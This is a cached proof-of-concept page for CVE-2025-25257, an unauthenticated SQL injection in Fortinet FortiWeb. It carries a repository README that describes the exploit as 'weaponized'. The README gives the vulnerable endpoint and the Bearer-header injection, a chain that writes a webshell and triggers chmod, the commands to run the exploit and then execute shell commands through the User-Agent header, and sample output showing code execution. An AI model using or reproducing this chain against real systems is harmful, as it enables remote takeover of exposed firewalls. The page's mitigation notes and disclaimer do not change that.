CVE-2025-25257 PoC — Fortinet FortiWeb SQL注入漏洞

Source

https://github.com/0xgh057r3c0n/CVE-2025-25257

Associated Vulnerability

Title:Fortinet FortiWeb SQL注入漏洞 (CVE-2025-25257)
Description:Fortinet FortiWeb是美国飞塔（Fortinet）公司的一款Web应用层防火墙，它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁，保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10之前版本存在SQL注入漏洞，该漏洞源于对SQL命令中特殊元素中和不当，可能导致SQL注入攻击。

Description

PoC for CVE-2025-25257, a critical unauthenticated SQL injection in FortiWeb. Exploits SQLi via the Authorization header to write a webshell and gain RCE. No login required. Fully automated.

Readme

<p align="center">
  <img src="sample.png" width="400" />
</p>

<h1 align="center">🚨 CVE-2025-25257 – FortiWeb SQLi to RCE</h1>
<p align="center"><b>Critical SQL Injection → Webshell Execution</b></p>
<p align="center"><code>Discovered and weaponized by 0xgh057r3c0n</code></p>

---

## 🧠 Vulnerability Overview

`CVE-2025-25257` affects FortiWeb systems exposing the endpoint `/api/fabric/device/status`, which fails to properly sanitize `Authorization` header input.

> An attacker can perform unauthenticated SQL injection to write a webshell on the server and execute commands remotely.

---

## 💥 Attack Flow

```text
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
````

---

## 📍 Vulnerable Endpoint

```
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
```

---

## 🔓 Exploit Features

* SQLi via Bearer token
* SQL `INTO OUTFILE` to drop shell
* Python hook triggers chmod
* Commands executed via User-Agent
* Fully automated PoC

---

## 🧪 Usage

```bash
python3 CVE-2025-25257.py -t https://target-host.com
```

Then:

```bash
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
```

---

## 🔧 Requirements

* Python 3.6+
* `requests` module

Install:

```bash
pip install requests
```

---

## 📤 Sample Output

```text
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header
```

---

## 📊 CVSS Estimate

| Metric              | Value          |
| ------------------- | -------------- |
| Base Score          | 9.8 (CRITICAL) |
| Attack Vector       | Network        |
| Privileges Required | None           |
| User Interaction    | None           |
| Impact              | High (C/I/A)   |

---

## 🛡️ Mitigation

* Update FortiWeb firmware (if patch available)
* Sanitize all header inputs
* Restrict file write paths and CGI execution

---

## 👨‍💻 Author

**0xgh057r3c0n**
🔗 [github.com/0xgh057r3c0n](https://github.com/0xgh057r3c0n)

---

## ⚠️ Disclaimer

This proof-of-concept is for **educational and authorized testing** only.
Use at your own risk. The author is not responsible for misuse.

---

File Snapshot


 [4.0K]  /data/pocs/2b821728f5a49cb396016fb0ae017e2302d39746
├── [5.7K]  CVE-2025-25257.py
├── [1.1K]  LICENSE
├── [2.4K]  README.md
└── [119K]  sample.png

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!